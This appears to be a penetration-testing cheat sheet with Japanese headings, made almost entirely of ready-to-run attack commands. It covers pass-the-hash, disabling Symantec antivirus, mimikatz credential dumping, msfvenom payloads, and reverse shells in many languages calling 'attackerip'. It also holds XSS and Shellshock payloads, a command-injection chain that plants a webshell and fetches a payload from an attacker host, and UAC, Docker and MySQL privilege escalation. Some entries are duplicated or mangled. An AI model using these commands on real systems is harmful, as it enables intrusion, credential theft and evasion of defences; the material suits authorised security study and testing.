powershell-import /path/to/BloodHound.ps1 powershell Get-BloodHoundData | Export-BloodHoundCSV
# Symantec AVバイパス```
During our latest pentest, we faced shitty AV problem since we couldn't get any meterpreter session with psexec cuz of Symatec AV, So we would like to share our solution for this problem:
First We Need to connect with the local admin as system using pth (local hash extracted with bkhive and samdump2)
$./pth-winexe -U DOMAIN.COM/USERNAME%cc5e9acbad1b25c9aad3b435b51404ee:996e6760cddd8815a2c24a110cf040fb //10.0.42.154 cmd --system
Then let's Stop the AV Service
cd "C:\Program Files\Symantec\Symantec Endpoint Protection"
smc.exe -stop
Nice now we got rid of the AV, however our payload and IP was still blocked since they use an IPS
so we used a reverse_https listener and psexec_psh to bypass it:
mohamed@KeyStrOke:~$ msfconsole
use exploit/windows/smb/psexec_psh
set payload windows/meterpreter/reverse_https
set StageEncoder x86/shikata_ga_nai
set EnableStageEncoding true
set SMBUSER USERNAME
set SMBPASS cc5e9acbad1b25c9aad3b435b51404ee:996e6760cddd8815a2c24a110cf040fb
set lhost IP
set lport 443
exploit -j
and BOOM :D
Server username: NT AUTHORITY\SYSTEM
Enjoy your Session
meterpreter > load kiwi meterpreter > cred_all
# ネットワーク
### Nmap フルWeb脆弱性スキャン```
cd /usr/share/nmap/scripts/
wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz
nmap -sS -sV --script=vulscan/vulscan.nse target
nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target
nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target
nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 target
nmap -sV --script=vuln target
nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target
dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt
### Nikto ウェブサーバースキャナー```
nikto -C all -h http://IP
git clone https://github.com/wpscanteam/wpscan.git && cd wpscan ./wpscan –url http://IP/ –enumerate p
### HTTPフィンガープリンティング```
wget http://www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip
cd httprint_301/linux/
./httprint -h http://IP -s signatures.txt
git clone https://github.com/wpscanteam/wpscan.git && cd wpscan ./wpscan –url http://IP/ –enumerate p
### SKIP Fish Scanner```
skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://IP
1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys) 1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys) 2)fargement 3)data packed – like orginal one not scan packet 4)use auxiliary/scanner/ip/ipidseq for find zombie ip in network to use them to scan — nmap -sI ip target 5)nmap –source-port 53 target nmap -sS -sV -D IP1,IP2,IP3,IP4,IP5 -f –mtu=24 –data-length=1337 -T2 target ( Randomize scan form diff IP) nmap -Pn -T2 -sV –randomize-hosts IP1,IP2 nmap –script smb-check-vulns.nse -p445 target (using NSE scripts) nmap -sU -P0 -T Aggressive -p123 target (Aggresive Scan T1-T5) nmap -sA -PN -sN target nmap -sS -sV -T5 -F -A -O target (version detection) nmap -sU -v target (Udp) nmap -sU -P0 (Udp) nmap -sC 192.168.31.10-12 (all scan default)
### NC スキャン```
nc -v -w 1 target -z 1-1000
for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done
us -H -msf -Iv 192.168.56.101 -p 1-65535 us -H -mU -Iv 192.168.56.101 -p 1-65535
-H resolve hostnames during the reporting phase -m scan mode (sf - tcp, U - udp) -Iv - verbose
### Xprobe2 OSフィンガープリンティング```
xprobe2 -v -p tcp:80:open IP
nmblookup -A target smbclient //MOUNT/share -I target -N rpcclient -U "" target enum4linux target
### SNMP 列挙```
snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP
net localgroup Users net localgroup Administrators search dir/s *.doc system("start cmd.exe /k $cmd") sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore /c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779 mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" Procdump.exe -accepteula -ma lsass.exe lsass.dmp mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords" C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp For 32 bits C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp For 64 bits
### PuTTY Link トンネル```
Forward remote port to local address
cmd.exe /c echo y | .\plink.exe -P 22 -l <USER> -pw "password" -R PORT_TO_FORWARD:127.0.0.1:ATTACKER_PORT <IP> 2>&1
meterpreter > portfwd add –l 3389 –p 3389 –r 172.16.194.141 kali > rdesktop 127.0.0.1:3389
### RDPアクセスを有効にする```
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
netsh firewall set opmode disable
### Meterpreter VNC\RDP```
git clone https://github.com/gentilkiwi/mimikatz.git
privilege::debug
sekurlsa::logonPasswords full
net user test 1234 /add net localgroup administrators test /add
### ハッシュの受け渡し```
git clone https://github.com/byt3bl33d3r/pth-toolkit
pth-winexe -U hash //IP cmd
or
apt-get install freerdp-x11
xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP
or
meterpreter > run post/windows/gather/hashdump
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
msf exploit(psexec) > exploit
meterpreter > shell
hashcat -m 400 -a 0 hash /root/rockyou.txt
### Netcat の例```
c:> nc -l -p 31337
#nc 192.168.0.10 31337
c:> nc -v -w 30 -p 31337 -l < secret.txt
#nc -v -w 2 192.168.0.10 31337 > secret.txt
nc 192.168.0.10 80 GET / HTTP/1.1 Host: 192.168.0.10 User-Agent: Mozilla/4.0 Referrer: www.example.com
### Windows リバースシェル```
c:>nc -Lp 31337 -vv -e cmd.exe
nc 192.168.0.10 31337
c:>nc example.com 80 -e cmd.exe
nc -lp 80
nc -lp 31337 -e /bin/bash
nc 192.168.0.10 31337
nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000
find / -user root -perm -4000 -print
find / -group root -perm -2000 -print
find / -perm -4000 -o -perm -2000 -print
find / -nouser -print
find / -nogroup -print
find / -type l -ls
### Python shell```
python -c 'import pty;pty.spawn("/bin/bash")'
python2 -m SimpleHTTPServer python3 -m http.server ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start" php -S 0.0.0.0:8888
### プロセスのPIDを取得```
fuser -nv tcp 80
fuser -k -n tcp 80
hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp
### リモートWindows共有のマウント```
smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
gcc -m32 -o output32 hello.c (32 bit) gcc -m64 -o output hello.c (64 bit)
### KaliでWindowsエクスプロイトをコンパイルする```
c:>nc -Lp 31337 -vv -e cmd.exe
nc 192.168.0.10 31337
c:>nc example.com 80 -e cmd.exe
nc -lp 80
nc -lp 31337 -e /bin/bash
nc 192.168.0.10 31337
nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000
wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download wine mingw-get-setup.exe select mingw32-base cd /root/.wine/drive_c/windows wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip cd /root/.wine/drive_c/MinGW/bin wine gcc -o ability.exe /tmp/exploit.c -lwsock32 wine ability.exe
### NASM コマンド```
nasm -f bin -o payload.bin payload.asm
nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload
ssh -D 127.0.0.1:1080 -p 22 user@IP Add socks4 127.0.0.1 1080 in /etc/proxychains.conf proxychains commands target
### あるネットワークから別のネットワークへのSSHピボット```
ssh -D 127.0.0.1:1080 -p 22 user1@IP1
Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2
Add socks4 127.0.0.1 1081 in /etc/proxychains.conf
proxychains commands target
route add X.X.X.X 255.255.255.0 1 use auxiliary/server/socks4a run proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E
or
meterpreter > ipconfig IP Address : 10.1.13.3 meterpreter > run autoroute -s 10.1.13.0/24 meterpreter > run autoroute -p 10.1.13.0 255.255.255.0 Session 1 meterpreter > Ctrl+Z msf auxiliary(tcp) > use exploit/windows/smb/psexec msf exploit(psexec) > set RHOST 10.1.13.2 msf exploit(psexec) > exploit meterpreter > ipconfig IP Address : 10.1.13.2
### CSVファイルを使用したExploit-DB検索```
git clone https://github.com/offensive-security/exploit-database.git
cd exploit-database
./searchsploit –u
./searchsploit apache 2.2
./searchsploit "Linux Kernel"
cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep "<|<=" | sort -k3
msfvenom -p windows/meterpreter/reverse_tcp LHOST= X > system.exe msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=443 R > exploit.php msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -e -a x86 --platform win -f asp -o file.asp msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f c
### MSF Linux Reverse Meterpreter Binary```
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 --platform linux -o shell
msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 --platform win -f c
### MSF リバースシェル Python スクリプト```
msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp -a x86 --platform win -o shell.asp
### MSF リバースBashシェル```
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -o shell.php add <?php at the beginning perl -i~ -0777pe's/^/<?php \n/' shell.php
### MSF Reverse Win Bin```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe
find / -uid 0 -perm -4000
find / -perm -o=w
find / -name " " -print find / -name ".." -print find / -name ". " -print find / -name " " -print
find / -nouser
lsof +L1
lsof -i
arp -a
getent passwd
getent group
for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done
cat /dev/urandom| tr -dc ‘a-zA-Z0-9-!@#$%^&*()+{}|:<>?=’|fold -w 12| head -n 4
find . | xargs -I file lsattr -a file 2>/dev/null | grep ‘^….i’
chattr -i file
### Windows バッファオーバーフローエクスプロイトコマンド```
msfvenom -p windows/shell_bind_tcp -a x86 --platform win -b "\x00" -f c
msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 -a x86 --platform win -e x86/shikata_ga_nai -b "\x00" -f c
COMMONLY USED BAD CHARACTERS:
\x00\x0a\x0d\x20 For http request
\x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c Ending with (0\n\r_)
# Useful Commands:
pattern create
pattern offset (EIP Address)
pattern offset (ESP Address)
add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )
!pvefindaddr pattern_create 5000
!pvefindaddr suggest
!pvefindaddr modules
!pvefindaddr nosafeseh
!mona config -set workingfolder C:\Mona\%p
!mona config -get workingfolder
!mona mod
!mona bytearray -b "\x00\x0a"
!mona pc 5000
!mona po EIP
!mona suggest
!mona suggest !mona nosafeseh nseh="\xeb\x06\x90\x90" (next seh chain) iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN)
### ROP (DEP)```
# https://en.wikipedia.org/wiki/Return-oriented_programming
# https://en.wikipedia.org/wiki/Data_Execution_Prevention
!mona modules
!mona ropfunc -m *.dll -cpb "\x00\x09\x0a"
!mona rop -m *.dll -cpb "\x00\x09\x0a" (auto suggest)
!mona noaslr
### EGGハンター技術```
# https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
# http://www.fuzzysecurity.com/tutorials/expDev/4.html
!mona jmp -r esp
!mona egg -t lxxl
\xeb\xc4 (jump backward -60)
buff=lxxllxxl+shell
!mona egg -t 'w00t'
break *_start
next step n s
continue c
checking 'REGISTERS' and 'MEMORY'
print /d –> Decimal print /t –> Binary print /x –> Hex O/P : (gdb) print /d $eax $17 = 13 (gdb) print /t $eax $18 = 1101 (gdb) print /x $eax $19 = 0xd (gdb)
command : x/nyz (Examine) n –> Number of fields to display ==> y –> Format for output ==> c (character) , d (decimal) , x (Hexadecimal) z –> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)
### BASH リバースシェル```
bash -i >& /dev/tcp/X.X.X.X/443 0>&1
exec /bin/bash 0&0 2>&0
exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done
exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done
/bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1
/bin/bash -i > /dev/tcp/X.X.X.X/443 0<&1 2>&1
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’
### RUBY リバースシェル```
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
# for win platform
ruby -rsocket -e 'c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby -rsocket -e 'f=TCPSocket.open("attackerip","443").to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
### PHP リバースシェル```
php -r '$sock=fsockopen("attackerip",443);exec("/bin/sh -i <&3 >&3 2>&3");'
r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attackerip/443;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[]) p.waitFor()
### NETCAT リバースシェル```
nc -e /bin/sh attackerip 4444
nc -e /bin/sh 192.168.37.10 443
# If the -e option is disabled, try this
# mknod backpipe p && nc attackerip 443 0<backpipe | /bin/bash 1>backpipe
/bin/sh | nc attackerip 443
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4443 0/tmp/
# If you have the wrong version of netcat installed, try
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f
mknod backpipe p && telnet attackerip 443 0<backpipe | /bin/bash 1>backpipe
### XTERM リバースシェル```
# Start an open X Server on your system (:1 – which listens on TCP port 6001)
apt-get install xnest
Xnest :1
# Then remember to authorise on your system the target IP to connect to you
xterm -display 127.0.0.1:1
# Run this INSIDE the spawned xterm on the open X Server
xhost +targetip
# Then on the target connect back to the your X Server
xterm -display attackerip:1
/usr/openwin/bin/xterm -display attackerip:1
or
$ DISPLAY=attackerip:0 xterm
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet ("< iframes > src=http://IP:PORT </ iframes >")
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//–>">'>
";!–"=&{()}
<IMG src="javascript:alert("XSS');">
""><IMG src="https://raw.githubusercontent.com/ihebski/a-red-teamer-diaries/HEAD/jav%20ascript:alert("XSS');">
perl -e 'print "";' > out
(">< iframes http://google.com < iframes >)
"> %253cscript%253ealert(document.cookie)%253c/script%253e ">alert(document.cookie) %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E### SSH 経由 SCTP (Socat を使った)```
# on remote server
# assuming you want the SCTP socket to listen on port 80/SCTP and sshd is on 22/TCP
$ socat SCTP-LISTEN:80,fork TCP:localhost:22
# localhost
# replace SERVER_IP with IP of listening server, and 80 with whatever port the SCTP listener is on :)
$ socat TCP-LISTEN:1337,fork SCTP:SERVER_IP:80
# create socks proxy
# replace username and -p port value as needed...
$ ssh -lusername localhost -D 8080 -p 1337
https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version
wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run && chmod +x metasploit-latest-linux-x64-installer.run && ./metasploit-latest-linux-x64-installer.run
$ /opt/metasploit/createuser [] Please enter a username: root [] Creating user 'root' with password 'LsRRV[I^5' ...
$ /opt/metasploit/app/msfupdate
$ /opt/metasploit/app/msfconsole
### Tor Nat Traversal```
# install to server
$ apt-get install tor torsocks
# bind ssh to tor service port 80
# /etc/tor/torrc
SocksPolicy accept 127.0.0.1
SocksPolicy accept 192.168.0.0/16
Log notice file /var/log/tor/notices.log
RunAsDaemon 1
HiddenServiceDir /var/lib/tor/ssh_hidden_service/
HiddenServicePort 80 127.0.0.1:22
PublishServerDescriptor 0
$ /etc/init.d/tor start
$ cat /var/lib/tor/ssh_hidden_service/hostname
3l5zstvt1zk5jhl662.onion
# ssh connect from client
$ apt-get install torsocks
$ torsocks ssh [email protected] -p 80
$ ./fierce.pl -dns example.com $ ./fierce.pl –dns example.com –wordlist myWordList.txt
### Metagoofil メタデータ収集ツール```
# http://www.edge-security.com/metagoofil.php
#automate search engine document retrieval and analysis. It also has the capability to provide MAC
# addresses, username listings, and more
$ python metagoofil.py -d example.com -t doc,pdf -l 200 -n 50 -o examplefiles -f results.html
$ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24 $ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt
$ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt $ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt $ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt
$ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt $ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt
$ grep "open" FullTCP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "T:"$0}' $ grep "open" FullUDP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "U:"$0}'
$ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt
$ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt
$ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt
### Nmap – ファイアウォール回避のテクニック```
# fragmentation
$ nmap -f
# change default MTU size number must be a multiple of 8 (8,16,24,32 etc)
$ nmap --mtu 24
# Generates a random number of decoys
$ nmap -D RND:10 [target]
# Manually specify the IP addresses of the decoys
$ nmap -D decoy1,decoy2,decoy3 etc.
# Idle Zombie Scan, first t need to find zombie ip
$ nmap -sI [Zombie IP] [Target IP]
# Source port number specification
$ nmap --source-port 80 IP
# Append Random Data to scan packages
$ nmap --data-length 25 IP
# MAC Address Spoofing, generate different mac for host pc
$ nmap --spoof-mac Dell/Apple/3Com IP
$ ./shocker.py -H 192.168.56.118 --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo $(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80
$ nc -l -p 443 $ echo "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.56.103 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80
### Dockerでルート```
# get root with docker
# user must be in docker group
ek@victum:~/docker-test$ id
uid=1001(ek) gid=1001(ek) groups=1001(ek),114(docker)
ek@victum:~$ mkdir docker-test
ek@victum:~$ cd docker-test
ek@victum:~$ cat > Dockerfile
FROM debian:wheezy
ENV WORKDIR /stuff
RUN mkdir -p $WORKDIR
VOLUME [ $WORKDIR ]
WORKDIR $WORKDIR
<< EOF
ek@victum:~$ docker build -t my-docker-image .
ek@victum:~$ docker run -v $PWD:/stuff -t my-docker-image /bin/sh -c \
'cp /bin/sh /stuff && chown root.root /stuff/sh && chmod a+s /stuff/sh'
./sh
whoami
# root
ek@victum:~$ docker run -v /etc:/stuff -t my-docker-image /bin/sh -c 'cat /stuff/shadow'
$ apt-get update $ apt-get -y install ruby-dev git make g++ $ gem install bundler $ git clone https://github.com/iagox86/dnscat2.git $ cd dnscat2/server $ bundle install $ ruby ./dnscat2.rb dnscat2> New session established: 16059 dnscat2> session -i 16059
$ dnscat --host
### アセンブリコードのコンパイル```
nasm -f elf32 simple32.asm -o simple32.o
ld -m elf_i386 simple32.o simple32
nasm -f elf64 simple.asm -o simple.o
ld simple.o -o simple
$ wget -O - -q "http://domain.tk/sh.php?cmd=whoami" $ wget -O - -q "http://domain.tk/sh.php?cmd=ssh-keygen -f /tmp/id_rsa -N "" " $ wget -O - -q "http://domain.tk/sh.php?cmd=cat /tmp/id_rsa"
$ useradd -m tempuser $ mkdir /home/tempuser/.ssh && chmod 700 /home/tempuser/.ssh $ wget -O - -q "http://domain.tk/sh.php?cmd=cat /tmp/id_rsa" > /home/tempuser/.ssh/authorized_keys $ chmod 700 /home/tempuser/.ssh/authorized_keys $ chown -R tempuser:tempuser /home/tempuser/.ssh
$ wget -O - -q "http://domain.tk/sh.php?cmd=ssh -i /tmp/id_rsa -o StrictHostKeyChecking=no -R 127.0.0.1:8080:192.168.20.13:8080 -N -f tempuser@<attacker_ip>"
### Patatorは多目的ブルートフォーサーです```
# git clone https://github.com/lanjelot/patator.git /usr/share/patator
# SMTP bruteforce
$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst
$ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.17.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name'
$ service postgresql start $ msfdb init $ apt-get install golang $ mkdir /root/gocode $ export GOPATH=/root/gocode $ go get github.com/yudai/gotty $ gocode/bin/gotty -a 127.0.0.1 -w msfconsole
### POST RCE で完全なシェルを取得する```
attacker:~$ curl -i -s -k -X 'POST' --data-binary $'IP=%3Bwhoami&submit=submit' 'http://victum.tk/command.php'
attacker:~$ curl -i -s -k -X 'POST' --data-binary $'IP=%3Becho+%27%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3B+%3F%3E%27+%3E+..%2Fshell.php&submit=submit' 'http://victum.tk/command.php'
attacker:~$ curl http://victum.tk/shell.php?cmd=id
# download reverse shell to server (phpshell.php)
http://victum.tk/shell.php?cmd=php%20-r%20%27file_put_contents%28%22phpshell.php%22,%20fopen%28%22http://attacker.tk/phpshell.txt%22,%20%27r%27%29%29;%27
# run nc and execute phpshell.php
attacker:~$ nc -nvlp 1337
$ wget http://www.sno.phy.queensu.ca/~phil/exiftool/Image-ExifTool-10.13.tar.gz $ tar xzf Image-ExifTool-10.13.tar.gz $ cd Image-ExifTool-10.13 $ perl Makefile.PL $ make $ ./exiftool main.gif
### Win7 で Admin reverse_shell を使って SYSTEM を取得する```
msfvenom –p windows/shell_reverse_tcp LHOST=192.168.56.102 –f exe > danger.exe
#show account settings
net user <login>
# download psexec to kali
https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
# upload psexec.exe file onto the victim machine with powershell script
echo $client = New-Object System.Net.WebClient > script.ps1
echo $targetlocation = "http://192.168.56.102/PsExec.exe" >> script.ps1
echo $client.DownloadFile($targetlocation,"psexec.exe") >> script.ps1
powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1
# upload danger.exe file onto the victim machine with powershell script
echo $client = New-Object System.Net.WebClient > script2.ps1
echo $targetlocation = "http://192.168.56.102/danger.exe" >> script2.ps1
echo $client.DownloadFile($targetlocation,"danger.exe") >> script2.ps1
powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script2.ps1
# UAC bypass from precompiled binaries:
https://github.com/hfiref0x/UACME
# upload https://github.com/hfiref0x/UACME/blob/master/Compiled/Akagi64.exe to victim pc with powershell
echo $client = New-Object System.Net.WebClient > script2.ps1
echo $targetlocation = "http://192.168.56.102/Akagi64.exe" >> script3.ps1
echo $client.DownloadFile($targetlocation,"Akagi64.exe") >> script3.ps1
powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script3.ps1
# create listener on kali
nc -lvp 4444
# Use Akagi64 to run the danger.exe file with SYSTEM privileges
Akagi64.exe 1 C:\Users\User\Desktop\danger.exe
# create listener on kali
nc -lvp 4444
# The above step should give us a reverse shell with elevated privileges
# Use PsExec to run the danger.exe file with SYSTEM privileges
psexec.exe –i –d –accepteula –s danger.exe
https://technet.microsoft.com/en-us/security/bulletin/dn602597.aspx #ms15-051 https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html https://www.exploit-db.com/exploits/37049/
wmic qfe get wmic qfe | find "3057191"
https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe
http://www.ampliasecurity.com/research/windows-credentials-editor/ wce -w
http://www.heise.de/download/pwdump.html
### ウェブサイトのコンテンツに基づいて独自のdicファイルを生成する```
$ cewl -m 4 -w dict.txt http://site.url
$ john --wordlist=dict.txt --rules --stdout
$ nmap --script dns-brute --script-args dns-brute.domain=foo.com,dns-brute.threads=6,dns-brute.hostlist=./hostfile.txt,newtargets -sS -p 80 $ nmap --script dns-brute www.foo.com
### NmapでWAFを識別する```
$ nmap -p 80,443 --script=http-waf-detect 192.168.56.102
$ nmap -p 80,443 --script=http-waf-fingerprint 192.168.56.102
$ wafw00f www.hamza.com
$ nmap -v -p 139, 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.31.205 $ searchsploit ms08-067 $ python /usr/share/exploitdb/platforms/windows/remote/7132.py 192.168.31.205 1
### SQUIDプロキシを使用したNiktoスキャン```
$ nikto -useproxy http://squid_ip:3128 -h http://target_ip
$ function /usr/bin/foo () { /usr/bin/echo "It works"; } $ export -f /usr/bin/foo $ /usr/bin/foo
### MySQLがroot権限で実行されている場合のローカル権限昇格```
# Mysql Server version: 5.5.44-0ubuntu0.14.04.1 (Ubuntu)
$ wget 0xdeadbeef.info/exploits/raptor_udf2.c
$ gcc -g -c raptor_udf2.c
$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root -p
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/home/user/raptor_udf2.so'));
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
mysql> create function do_system returns integer soname 'raptor_udf2.so';
mysql> select * from mysql.func;
mysql> select do_system('echo "root:passwd" | chpasswd > /tmp/out; chown user:user /tmp/out');
user:~$ su -
Password:
user:~# whoami
root
root:~# id
uid=0(root) gid=0(root) groups=0(root)
root:~# patator ssh_login host=192.168.0.18 user=FILE0 password=FILE1 0=word.txt 1=word.txt -x ignore:mesg='Authentication failed.'
### LD_PRELOADを使用してプログラムに機能を注入する```
$ wget https://github.com/jivoi/pentest/ldpreload_shell.c
$ gcc -shared -fPIC ldpreload_shell.c -o ldpreload_shell.so
$ sudo -u user LD_PRELOAD=/tmp/ldpreload_shell.so /usr/local/bin/somesoft
